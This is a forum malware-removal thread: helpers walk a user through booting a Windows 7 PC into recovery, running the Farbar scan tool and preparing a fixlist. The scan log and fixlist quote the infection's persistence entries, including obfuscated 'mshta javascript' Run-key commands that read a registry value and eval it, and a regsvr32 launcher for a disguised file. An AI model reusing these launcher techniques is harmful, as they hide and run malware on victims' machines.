[SOLVED] Artemis Trojan

ot008239 (Contributor, joined Jul 17, 2015, 27 posts)
McAfee All Access reported an Artemis Trojan; a number of files were quarantined and then deleted. Over the following days the Firewall and on-line scans started failing intermittently, then stopped altogether.

The PC does not boot into Windows; it is basically locked in a loop of reporting corrupted system files: the scans run and then report that they are unable to fix the issues.

I have run SFC /scannow numerous times, and I have also run SFCFix; the report is attached.
 


Hi, ot008239.

Please download MiniToolBox, save it to your desktop and run it.

Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Devices
  • List Users, Partitions and Memory size.
  • List Minidump Files
Click Go and copy/paste the (do not attach) results (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.

Note: When using "Reset FF Proxy Settings" option Firefox should be closed.

Following that, please follow the instructions at Malware Removal Posting Instructions and provide the requested logs.
 
Re: Artemis Trojan

Sadly my PC doesn't boot in any Safe Modes, locked into a cycle for automatic repair, which fails.


From Startup Repair
Root cause found

Boot critical file c:\windows\system32\drivers\8b66cd9be5c7a4f2.sys is corrupt
 
Hi, ot008239. Let's give this a try:

  • Download FRST to a USB flash drive.
  • Download FRST64 to a USB flash drive.
  • Plug the USB drive into the infected machine.

Boot your computer into Recovery Environment

  • Restart the computer and press F8 repeatedly until the Advanced Options Menu appears.
  • Select Repair your computer.
  • Select Language and click Next
  • Enter password (if necessary) and click OK, you should now see the screen below ...

[image: W7InstallDisk2.png]


  • Select the Command Prompt option.
  • A command window will open.
    • Type notepad then hit Enter.
    • Notepad will open.
      • Click File > Open then select Computer.
      • Note down the drive letter for your USB Drive.
      • Close Notepad.
  • Back in the command window ....
    • Type e:/frst.exe and hit Enter (where e: is replaced by the drive letter for your USB drive)
    • Type e:/frst64.exe and hit Enter (where e: is replaced by the drive letter for your USB drive)
    • FRST will start to run.
      • When the tool opens click Yes to disclaimer.
      • Press Scan button.
      • When finished scanning it will make a log FRST.txt on the flash drive.
  • Close the command window.
  • Boot back into normal mode and post me the FRST.txt log please.
 
Followed the instructions, but I get the message below, even though I can change to the USB drive and the files are visible in Notepad and on the command line:

The Subsystem needed to support the image type is not present
 
Since SFC didn't fix the problem, see if Repair will.

As before, Boot your computer into Recovery Environment

  • Restart the computer and press F8 repeatedly until the Advanced Options Menu appears.
  • Select Repair your computer.
  • Select Language and click Next
  • Enter password (if necessary) and click OK, you should now see the screen below ...

[image: W7InstallDisk2.png]


This time, select Startup Repair. Note: Startup repair sometimes takes three times. The first time you run it, it attempts to repair any system level corruption via SFC /SCANNOW. The second time it runs, it checks the hard disk for bad sectors and a corrupted file system. This is usually the longer of the three runs. The third time it runs, it tries to use a system restore point to replace a possibly damaged registry.

Since it is unknown whether the problem was caused by McAfee or something else, if you have the opportunity to select a restore point, I suggest using a date prior to McAfee removing the files, as the trojan identified is a number of years old. The main thing is to see if we can get your computer up and running again, and then we'll deal with any infection.
 
System restores have been unsuccessful. I have Dell DataSafe with an option to reset back to factory defaults without affecting data; are you familiar with this feature?
 
I've seen that it is a Dell feature but have never used a Dell computer. Since it will reset to factory defaults, you may want to try a very nice recovery Linux LiveCD called Trinity Rescue Kit to retrieve files from dead/dying/infected computers, and to also do some virus scanning as well as removing passwords, etc. You can get it from here: Trinity Rescue Kit.

In the meantime, I'll ask if anyone has any other suggestions for you to try first. Another member and I believe that the 8b66cd9be5c7a4f2.sys driver is malware and tied to the problem.
 
Here's a question first. A member of the team (thanks, BrianDrab) wonders if perhaps you inadvertently tried to use the wrong version of FRST. With a 64-bit operating system, you need to use FRST 64. If you used the wrong version, please try the instructions from post #43 above again to use the Farbar Recovery Scan Tool.

A quick repost of the instructions:

Please download Farbar Recovery Scan Tool and save it to a flash drive.

Plug the flash drive into the infected PC.

Enter System Recovery Options.

To enter System Recovery Options from the Advanced Boot Options:
  • Restart the computer.
  • As soon as the BIOS is loaded begin tapping the F8 key until Advanced Boot Options appears.
  • Use the arrow keys to select the Repair your computer menu item.
  • Choose your language settings, and then click Next.
  • Select the operating system you want to repair, and then click Next.
  • Select your user account and click Next.

On the System Recovery Options menu you will get the following options:
Startup Repair
System Restore
Windows Complete PC Restore
Windows Memory Diagnostic Tool
Command Prompt


  • Select Command Prompt
  • In the command window type in notepad and press Enter.
  • The notepad opens. Under File menu select Open.
  • Select "Computer" and find your flash drive letter and close the notepad.
  • In the command window type e:\frst.exe (for the 64-bit version type e:\frst64) and press Enter
    Note: Replace letter e with the drive letter of your flash drive.
  • The tool will start to run.
  • When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) on the flash drive. Please copy and paste it to your reply.
 
Output from frst64


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:20-07-2015
Ran by SYSTEM on MININT-J3UB2EQ on 24-07-2015 11:40:37
Running from C:\
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Recovery
The current controlset is ControlSet001
ATTENTION!:=====> If the system is bootable FRST must be run from normal or Safe mode to create a complete log.
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Geeks to Go Forum
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Stage Remote] => C:\Program Files (x86)\Dell\Stage Remote\StageRemote.exe [2022976 2011-06-27] ()
HKLM\...\Run: [boinctray] => C:\Program Files\BOINC\boinctray.exe [68928 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [boincmgr] => C:\Program Files\BOINC\boincmgr.exe [8926016 2015-03-09] (Space Sciences Laboratory)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-06] (Apple Inc.)
HKLM-x32\...\Run: [RemoteControl9] => C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe [87336 2010-10-01] (CyberLink Corp.)
HKLM-x32\...\Run: [PDVD9LanguageShortcut] => C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe [50472 2010-09-17] (CyberLink Corp.)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [616272 2015-04-07] (McAfee, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [RoxWatchTray] => C:\Program Files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatchTray12OEM.exe [240112 2010-11-24] (Sonic Solutions)
HKLM-x32\...\Run: [Desktop Disc Tool] => C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe [514544 2010-11-17] ()
HKLM-x32\...\Run: [AccuWeatherWidget] => C:\Program Files (x86)\Dell Stage\Dell Stage\AccuWeather\accuweather.exe [968048 2012-02-01] ()
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-03-20] (Apple Inc.)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [719272 2015-04-02] (McAfee, Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [335232 2015-04-10] (Oracle Corporation)
HKLM\...\RunOnce: [*Restore] => C:\Windows\system32\rstrui.exe [296960 2015-05-25] (Microsoft Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\Orrin JNR\...\Run: [Google Update] => C:\Users\Orrin JNR\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-07-15] (Google Inc.)
HKU\Thomas\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-16] (Skype Technologies S.A.)
HKU\Thomas\...\Run: [Amazon Music] => C:\Users\Thomas\AppData\Local\Amazon Music\Amazon Music Helper.exe [6277952 2014-12-07] ()
HKU\Thomas\...\Run: [OneDrive] => C:\Users\Thomas\AppData\Local\Microsoft\OneDrive\OneDrive.exe [382664 2015-05-22] (Microsoft Corporation)
HKU\Thomas\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\Thomas\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:Ms3ZRq7u="V";g1l9=new%20ActiveXObject("WScript.Shell");ZolWKzx5R="EN4hV7";wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");Zyilg2gbV="hhx";eval(wNvs09);UeEVVe2o7="LbiEUgXF"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [**fdb291dc<*>] => mshta javascript:X2USNjN5="K1v";V22z=new%20ActiveXObject("WScript.Shell");B2kFNQdtA9="IqT";eO11jM=V22z.RegRead("HKCU\\software\\0c778563\\2d0e539a");c3NvvUZAl="Q";eval(eO11jM);gVac7qe="v7DcfT"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
HKU\Thomas\...\Run: [FireFoxUpdServeisSystem] => C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis\Microsoft_naragugica.exe [77312 2015-07-14] ()
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2739888 2015-05-18] (Microsoft Corporation)
S2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [155368 2015-07-03] (McAfee, Inc.)
S2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [753768 2015-04-07] (McAfee, Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
S2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.5.450.0\McCSPServiceHost.exe [207344 2015-04-08] (McAfee, Inc.)
S2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McNaiAnn; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [612688 2015-04-09] (McAfee, Inc.)
S2 mcpltsvc; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 McProxy; C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232656 2015-02-17] (McAfee, Inc.)
S2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [372144 2015-04-06] (McAfee, Inc.)
S2 mfevtp; C:\Windows\system32\mfevtps.exe [250672 2015-02-17] (McAfee, Inc.)
S2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [340744 2015-04-02] (McAfee, Inc.)
S2 syshost32; C:\Windows\Installer\{269A4ED8-3094-6D54-48F0-3CC425AC5ECE}\syshost.exe [196923 2015-07-14] ()
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [68784 2015-02-17] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
S2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [76064 2015-03-27] (McAfee, Inc.)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [401736 2015-02-17] (McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [337888 2015-02-17] (McAfee, Inc.)
S0 mfedisk; C:\Windows\System32\DRIVERS\mfedisk.sys [101872 2015-02-17] (McAfee, Inc.)
S3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [488000 2015-02-17] (McAfee, Inc.)
S0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [864072 2015-02-17] (McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [482600 2015-01-15] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [100720 2015-01-15] (McAfee, Inc.)
S0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [340448 2015-02-17] (McAfee, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb_AMD64.sys [27520 2007-05-14] (Research In Motion Limited)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [564824 2013-01-03] (Duplex Secure Ltd.)
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-24 11:40 - 2015-07-24 11:40 - 00000000 _____ C:\FRST.txt
2015-07-24 11:36 - 2015-07-24 11:40 - 00000000 ____D C:\FRST
2015-07-23 01:37 - 2015-07-23 01:37 - 02135552 _____ (Farbar) C:\frst64.exe
2015-07-21 13:08 - 2015-07-21 13:08 - 06420480 _____ C:\Program Files (x86)\GUTD3D3.tmp
2015-07-21 12:29 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Desktop\SFCFix.zip
2015-07-21 12:24 - 2015-07-21 12:25 - 00002289 _____ C:\Users\Thomas\Downloads\SFCFix.zip
2015-07-18 19:31 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\tor
2015-07-17 14:37 - 2015-07-21 12:51 - 00000000 ____D C:\Users\Thomas\AppData\Local\niemiro
2015-07-17 05:03 - 2015-07-17 05:03 - 00000387 _____ C:\Users\Thomas\Desktop\copy.txt
2015-07-17 04:56 - 2015-07-17 04:57 - 00000000 ____D C:\Users\Thomas\copy
2015-07-17 04:55 - 2015-07-17 04:55 - 00000000 ____D C:\Users\Thomas\Downloads\Copy
2015-07-17 03:11 - 2015-07-21 12:51 - 00003148 _____ C:\Users\Thomas\Desktop\SFCFix.txt
2015-07-17 03:11 - 2015-07-21 12:51 - 00000000 ____D C:\SFCFix
2015-07-17 02:50 - 2015-07-17 02:55 - 00003212 _____ C:\Users\Thomas\sfcdetails.txt
2015-07-15 23:06 - 2015-07-15 23:06 - 00000000 ____D C:\Quarantine
2015-07-15 22:56 - 2015-07-17 03:37 - 00000000 ____D C:\Program Files (x86)\stinger
2015-07-15 22:55 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\Downloads\stinger32-epo
2015-07-15 13:35 - 2015-07-15 13:35 - 00000000 ____D C:\Users\Thomas\Desktop\McAfee File Lock
2015-07-15 12:14 - 2015-07-15 13:18 - 00095802 _____ C:\Users\Thomas\Desktop\sfcdetails.txt
2015-07-15 11:58 - 2015-07-15 11:58 - 00000000 ____D C:\Users\Thomas\McAfee File Lock
2015-07-14 03:26 - 2015-07-14 03:26 - 00094152 _____ C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys
2015-07-14 03:26 - 2015-07-14 03:26 - 00000342 _____ C:\Windows\PFRO.log
2015-07-14 03:22 - 2015-07-23 23:27 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis
2015-07-14 03:22 - 2015-07-14 03:22 - 00000064 _____ C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys
2015-07-13 12:45 - 2015-07-14 03:26 - 00000112 _____ C:\Windows\setupact.log
2015-07-13 12:45 - 2015-07-13 12:45 - 00000000 _____ C:\Windows\setuperr.log
2015-07-13 12:16 - 2015-07-13 12:16 - 00000000 ____D C:\Windows\System32\McAfee File Lock
2015-07-13 09:46 - 2015-07-13 09:46 - 00000000 ____D C:\ProgramData\DifhAvud
2015-07-13 05:48 - 2015-07-13 08:49 - 00266240 _____ C:\Users\Thomas\AppData\Roaming\C_G1awex.exe
2015-07-13 02:12 - 2015-07-13 02:14 - 00000157 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.dat
2015-07-13 02:11 - 2015-07-14 03:22 - 00000000 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.exe
2015-07-13 02:11 - 2015-07-13 02:12 - 00000000 ___HD C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2015-07-03 06:35 - 2015-07-12 10:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-06-28 10:52 - 2015-06-29 01:12 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\vlc
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\Users\Public\Desktop\VLC media player.lnk
2015-06-28 10:50 - 2015-06-28 10:50 - 00001032 _____ C:\ProgramData\Desktop\VLC media player.lnk
2015-06-28 10:49 - 2015-06-28 10:49 - 28849904 _____ C:\Users\Thomas\Downloads\vlc-2.2.1-win32.exe
2015-06-28 10:49 - 2015-06-28 10:49 - 00000000 ____D C:\Program Files (x86)\VideoLAN
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-07-23 23:28 - 2014-12-09 19:22 - 00000000 ____D C:\Windows\System32\appraiser
2015-07-23 23:28 - 2014-08-09 05:12 - 00000000 ____D C:\users\Guest
2015-07-23 23:28 - 2014-05-06 18:00 - 00000000 ___SD C:\Windows\System32\CompatTel
2015-07-23 23:28 - 2012-07-15 07:50 - 00000000 ____D C:\users\Orrin JNR
2015-07-23 23:28 - 2012-05-08 08:58 - 00000000 ____D C:\users\Thomas
2015-07-23 23:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\servicing
2015-07-23 23:27 - 2015-05-15 23:52 - 00000000 __RSD C:\Users\Thomas\Documents\McAfee Vaults
2015-07-23 23:27 - 2015-04-04 18:00 - 00000000 ___SD C:\Windows\System32\GWX
2015-07-23 23:27 - 2014-05-14 11:23 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\Skype
2015-07-23 23:27 - 2012-11-29 11:21 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\uTorrent
2015-07-23 23:27 - 2012-05-09 12:20 - 00000000 ____D C:\ProgramData\McAfee Security Scan
2015-07-23 23:27 - 2012-05-01 03:52 - 00000000 ____D C:\Program Files (x86)\Dell DataSafe Local Backup
2015-07-23 23:25 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\registration
2015-07-23 23:23 - 2012-05-08 09:19 - 00000000 ____D C:\ProgramData\BOINC
2015-07-23 23:22 - 2015-04-04 02:39 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-07-23 23:22 - 2012-05-01 04:08 - 00000000 ____D C:\Program Files\mcafee
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default\AppData\Local\SoftThinks
2015-07-22 10:20 - 2012-05-01 04:26 - 00000000 ____D C:\Users\Default User\AppData\Local\SoftThinks
2015-07-22 10:05 - 2013-10-23 06:27 - 00000000 ____D C:\ProgramData\boost_interprocess
2015-07-21 12:57 - 2012-05-01 04:15 - 00000000 ____D C:\ProgramData\Sonic
2015-07-15 19:47 - 2010-11-20 23:16 - 00000000 ___RD C:\Users\Public\Recorded TV
2015-07-14 14:58 - 2012-05-08 09:00 - 00000422 _____ C:\Windows\Tasks\SystemToolsDailyTest.job
2015-07-14 14:17 - 2013-03-28 13:55 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-07-14 14:06 - 2012-09-02 09:09 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-14 13:17 - 2013-03-28 13:55 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-07-14 13:17 - 2012-05-01 03:35 - 00778416 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-07-14 13:17 - 2012-05-01 03:35 - 00142512 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-14 12:49 - 2012-07-15 12:24 - 00000872 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3274687172-3602840966-2228239552-1006Core.job
2015-07-14 09:06 - 2012-09-02 09:09 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:42 - 2009-07-13 20:45 - 00028352 ____H C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-07-14 03:26 - 2009-07-13 21:08 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-07-14 03:26 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-07-13 19:42 - 2015-04-04 02:44 - 00004978 _____ C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for trustno1-Thomas trustno1
2015-07-13 12:46 - 2012-12-22 03:26 - 00000000 ___RD C:\Users\Thomas\SkyDrive
2015-07-13 10:53 - 2015-05-15 23:49 - 00000000 ____D C:\Program Files (x86)\McAfee
2015-07-13 10:53 - 2014-08-21 12:49 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-13 05:00 - 2012-05-09 05:00 - 00003488 _____ C:\Windows\System32\Tasks\PCDEventLauncher
2015-07-13 05:00 - 2012-05-08 09:00 - 00003450 _____ C:\Windows\System32\Tasks\SystemToolsDailyTest
2015-07-12 09:07 - 2009-07-13 21:13 - 00006506 _____ C:\Windows\System32\PerfStringBackup.INI
2015-07-12 09:00 - 2012-05-08 09:00 - 00000564 _____ C:\Windows\Tasks\PCDoctorBackgroundMonitorTask.job
2015-07-12 08:47 - 2014-11-12 00:47 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieBrowserModeList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieUserList
2015-07-12 08:47 - 2014-04-30 09:30 - 00000000 __SHD C:\Users\Thomas\AppData\Local\EmieSiteList
2015-07-04 19:00 - 2012-05-08 09:00 - 00004268 _____ C:\Windows\System32\Tasks\PCDoctorBackgroundMonitorTask
2015-07-02 12:51 - 2009-07-13 21:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2015-06-26 03:30 - 2014-11-09 11:44 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-06-26 03:30 - 2012-05-01 03:54 - 00000000 ____D C:\ProgramData\Skype
Files to move or delete:
====================
C:\ProgramData\msrllq.exe

==================== Known DLLs (Whitelisted) ================

==================== Bamital & volsnap Check =================
(There is no automatic fix for files that do not pass verification.)
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
==================== Restore Points =========================
Restore point made on: 2015-07-14 15:00:12
==================== Memory info ===========================
Percentage of memory in use: 10%
Total physical RAM: 8104.63 MB
Available physical RAM: 7220.89 MB
Total Virtual: 8102.83 MB
Available Virtual: 7193.83 MB
==================== Drives ================================
Drive c: (OS) (Fixed) (Total:450.91 GB) (Free:145.58 GB) NTFS
Drive g: (RECOVERY) (Fixed) (Total:14.81 GB) (Free:5.74 GB) NTFS ==>[system with boot components (obtained from reading drive)]
Drive x: (Boot) (Fixed) (Total:0.03 GB) (Free:0.03 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: ACEA298C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=14.8 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450.9 GB) - (Type=07 NTFS)

LastRegBack: 2015-07-14 03:56
==================== End of log ============================
 
That is one nasty infection on your computer. It is important for you to note up front that this family of malware works together to download other malware and can also give a malicious hacker backdoor access and control of your PC. I'll do my best to help you clean your computer.

  • Click Start
  • Type notepad.exe in the search programs and files box and click Enter.
  • A blank Notepad page should open.
  • Copy/Paste the contents of the code box below into Notepad.
Code:
HKLM-x32\...\Run: [] => [X]
HKLM\...\Policies\Explorer\Run: [711536280] => C:\ProgramData\msrllq.exe [52736 2010-11-20] ()
HKU\Thomas\...\Run: [**3fc8a7d2<*>] => mshta javascript:Ms3ZRq7u="V";g1l9=new%20ActiveXObject("WScript.Shell");ZolWKzx5R="EN4hV7";wNvs09=g1l9.RegRead("HKCU\\software\\0c778563\\2d0e539a");Zyilg2gbV="hhx";eval(wNvs09);UeEVVe2o7="LbiEUgXF"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [**fdb291dc<*>] => mshta javascript:X2USNjN5="K1v";V22z=new%20ActiveXObject("WScript.Shell");B2kFNQdtA9="IqT";eO11jM=V22z.RegRead("HKCU\\software\\0c778563\\2d0e539a");c3NvvUZAl="Q";eval(eO11jM);gVac7qe="v7DcfT"; <===== ATTENTION (Value Name with invalid characters)
HKU\Thomas\...\Run: [d3dxawex] => C:\Users\Thomas\AppData\Roaming\C_G1awex.exe [266240 2015-07-13] ()
HKU\Thomas\...\Run: [DifhAvud] => regsvr32.exe "C:\ProgramData\DifhAvud\AixpIvum.nyz"
HKU\Thomas\...\Run: [FireFoxUpdServeisSystem] => C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis\Microsoft_naragugica.exe [77312 2015-07-14] ()
S2 NetworkHostSrv; "C:\ProgramData\Online\sv.exe" [X]
S0 8b66cd9be5c7a4f2; C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys [94152 2015-07-14] () <===== ATTENTION Necurs Rootkit?
S1 fqjnrwka; \??\C:\Windows\system32\drivers\fqjnrwka.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
2015-07-21 13:08 - 2015-07-21 13:08 - 06420480 _____ C:\Program Files (x86)\GUTD3D3.tmp
2015-07-18 19:31 - 2015-07-22 19:41 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\tor
2015-07-14 03:26 - 2015-07-14 03:26 - 00094152 _____ C:\Windows\System32\Drivers\8b66cd9be5c7a4f2.sys
2015-07-14 03:22 - 2015-07-23 23:27 - 00000000 ____D C:\Users\Thomas\AppData\Roaming\FireFoxUpdServeis
2015-07-14 03:22 - 2015-07-14 03:22 - 00000064 _____ C:\Users\Thomas\AppData\Roaming\$FFFCB712AC.sys
2015-07-13 09:46 - 2015-07-13 09:46 - 00000000 ____D C:\ProgramData\DifhAvud
2015-07-13 05:48 - 2015-07-13 08:49 - 00266240 _____ C:\Users\Thomas\AppData\Roaming\C_G1awex.exe
2015-07-13 02:12 - 2015-07-13 02:14 - 00000157 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.dat
2015-07-13 02:11 - 2015-07-14 03:22 - 00000000 _____ C:\Users\Thomas\AppData\Local\svcxdcl32.exe
